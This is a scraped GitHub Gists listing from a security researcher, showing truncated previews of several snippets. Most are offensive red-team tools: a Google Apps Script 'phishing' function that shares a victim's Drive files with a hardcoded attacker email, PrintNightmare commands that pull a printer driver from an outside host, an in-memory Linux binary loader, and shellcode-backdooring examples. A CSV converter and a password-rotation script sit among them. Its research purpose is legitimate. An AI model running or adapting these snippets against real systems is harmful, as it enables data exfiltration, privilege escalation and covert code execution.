Dan Borges ahhh

@ahhh
ahhh / driveSearch.gs
Last active June 16, 2023 00:55
Google App Script Phishing #2
function driveSearch() {
  // Setup the exfil folder
  var user = Session.getActiveUser().getEmail();
  var folder = DriveApp.createFolder(user);
  var attackerEmail = "ahhh.db@gmail.com";
  folder.addViewer(attackerEmail);
  // Search Drive
  var files = DriveApp.searchFiles('hidden = false');
  // Iterate through files in Drive
@ahhh
ahhh / csv_to_jsonl.py
Last active July 28, 2022 16:58
quick script to help convert documents
#!/usr/bin/env python
import jsonlines
import argparse
import csv

def parseArgs():
    parser = argparse.ArgumentParser(description='Convert CSV to JSONL')
    parser.add_argument('file', type=str, help='csv file to read')
    args = parser.parse_args()
    print("Processing CSV File: " + args.file)
net use \\printnightmare.gentilkiwi.com\ipc$ /user:gentilguest password
rundll32 printui.dll,PrintUIEntry /in /n"\\printnightmare.gentilkiwi.com\Kiwi Legit Printer"
@ahhh
ahhh / Invoke-PasswordRoll.ps1
Last active May 24, 2021 07:36
Microsoft helper script to change the local account passwords
function Invoke-PasswordRoll
{
<#
.SYNOPSIS
This script can be used to set the local account passwords on remote machines to random passwords. The username/password/server combination will be saved in a CSV file.
The account passwords stored in the CSV file can be encrypted using a password of the administrators choosing to ensure clear-text account passwords aren't written to disk.
The encrypted passwords can be decrypted using another function in this file: ConvertTo-CleartextPassword
Function: Invoke-PasswordRoll
Author: Microsoft
Version: 1.0
@ahhh
ahhh / go-sharp-loader.go
Created August 5, 2020 21:20 — forked from ropnop/go-sharp-loader.go
Example Go file embedding multiple .NET executables
package main
/*
Example Go program with multiple .NET Binaries embedded
This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with:
$ go get -u github.com/gobuffalo/packr/packr
Place all your EXEs in a "binaries" folder
@ahhh
ahhh / invokeInMemLinux.go
Created July 19, 2020 21:22 — forked from capnspacehook/invokeInMemLinux.go
Executes a binary or file in memory on a Linux system. Uses the memfd_create(2) syscall. Credits and idea from: https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html
package main
import (
	"io/ioutil"
	"os"
	"os/exec"
	"strconv"
	"syscall"
@ahhh
ahhh / binjection_example.gs
Created July 2, 2020 23:32
Binjection example in gscript
// Example gscript template
// Title: Binjection Example
// Author: ahhh
// Purpose: Replaces an existing binary with a copy that has been backdoored with shellcode
// Gscript version: 1.0.0
// ATT&CK:
//priority:150
//timeout:150
//import:/tmp/loader.bin
@ahhh
ahhh / gbj.go
Created July 2, 2020 23:05
GBJ is a hacky shim used for using binjection in gscript
package gbj
import (
	"github.com/Binject/binjection/bj"
)
func PeBinject(sourceBytes []byte, shellcodeBytes []byte) ([]byte, error) {
@ahhh
ahhh / binjection_example.go
Created July 2, 2020 00:04
Using the binject/binjection library programmatically
package main
import (
	"io/ioutil"
	"fmt"
	"github.com/Binject/binjection/bj"
)
var (
	example_path = "example.exe"
@ahhh
ahhh / msfconsole.rc
Created February 25, 2020 09:02
example msfconsole.rc from red team planning book
spool /root/.msf4/spool.log
setg ConsoleLogging true
setg verbose true
setg LogLevel 5
setg SessionLogging true
setg TimestampOutput true
setg PromptTimeFormat %Y%m%d.%H%M%S%z
setg PROMPT %T S:%S J:%J
setg ExitOnSession false
setg DisableCourtesyShell true